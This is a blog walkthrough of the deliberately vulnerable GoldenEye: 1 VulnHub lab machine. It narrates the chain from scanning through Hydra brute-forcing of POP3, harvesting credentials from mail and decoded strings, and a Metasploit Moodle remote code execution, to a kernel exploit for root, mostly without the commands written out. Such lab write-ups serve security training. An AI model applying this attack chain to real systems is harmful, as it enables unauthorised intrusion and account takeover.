GoldenEye: 1 VulnHub Walkthrough

Hello Everyone, In this blog i am going to post walkthrough of GoldenEye 1. This machine is for them who have basic Knowledge and hand’s on experience with penetration Testing.

you can download the machine here.

Let’s Begin !!

Target IP – 192.168.43.155

Attacker IP – 102.168.43.139

So, Let’s start with scanning

Ok!! we can see there are 4 ports open.

25- smtp

80- http

55006- ssl/pop3

55007- pop3

Now, Let’s check the website running on port 80.

It says to Navigate to /sev-home/.

Ok, We need to Login.

So, i tried few default usernames and passwords but it didn’t work.

I thought of checking page source.

Ok, There is terminal.js Let’s open it.

We can there is HTML encoded password and two usernames.

boris

natalya

Let’s decode the password.

InvincibleHack3r

We got the password .

Let’s try to login on /sev-home/

Username – boris

Password – InvincibleHack3r

we logged in!!

I read the information written on the page.

the last sentence says POP3 is running on non-default port.

Even scan result says there is POP3 running on port 55007.

Let’s Bruteforce on POP3 with the usernames boris and natalya using the tool Hydra.

We found passwords.

boris – secret1!

natalya – bird

Now, Let’s connect to pop3 using the credentials by nc.

There are 3 Messages Let’s see,

It’s a message from admin to boris.

It’s a message from natalya to boris, that natalya can break boris codes.

In 3rd message we can see access codes are kept in root directory. So, we can’t access from here.

Let’s move to natalya

There are 2 mesages, Let’s see

It’s a message to natalya, that she has to stop breaking boris codes.

Ok! we got some information here,

username: xenia

password: RCP90rulez!

Domain: severnaya-station.com/gnocertdir

Before opening the domain we have to point server IP to severnaya-station.com in /etc/hosts

To check,

Let’s check in the browser

Now, Let’s login with the credentials we got in natalya mail.

username: xenia

password: RCP90rulez!

After logging in, I was exploring and found another user chat in messages.

if we read it it says,

My email username is “doak”.

Let’s bruteforce again with doak as the username on pop3 using hydra.

Ok! we got the password “goat“.

Now, let’s connect to pop3 using nc.

So, we got the login credentials of doak.

username: dr_doak

password: 4England!

Let’s login,

We logged in as dr_doak.

I was checking every module to find any clue then there is module My private files there i found a text file “s3cret.txt“

I downloaded the file and checked if we can find anything,

So, it says something is located in /dir007key/for-007.jpg

severnaya-station.com/dir007key/for-007.jpg

So, i opened above URL in browser

It’s an image. So i downloaded it and checked,

Ok! we can see something encoded string, It’s a base64 encoded string

eFdpbnRlcjE5OTV4IQ==

Let’ decode,

We got plain text string and we know it is admin’s password.

username: admin

password: xWinter1995x!

Let’s login,

We logged in as ADMIN.

Now, we should get shell on our terminal.

I searched if we can upload a file to get the revere shell but didn’t find any.

After exploring, i found the the website name as “MOODLE” and found it’s version.

I checked if there is any exploit for Moodle 2.2.3 and i found there is Remote Code Execution vulnerability .

So, i started Metasploit Framework.

we got the shell.

Now we have to get root access,

So, i got the version details.

I checked for the exploit and found 1.

Let’s download it,

and let’s edit the code

By default it is gcc change it to cc as gcc isn’t working on shell we got.

Save it and start python http server.

Now, let’s get the file into the shell we got,

Here, I got the ROOT access.

Writer: Anudeep is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.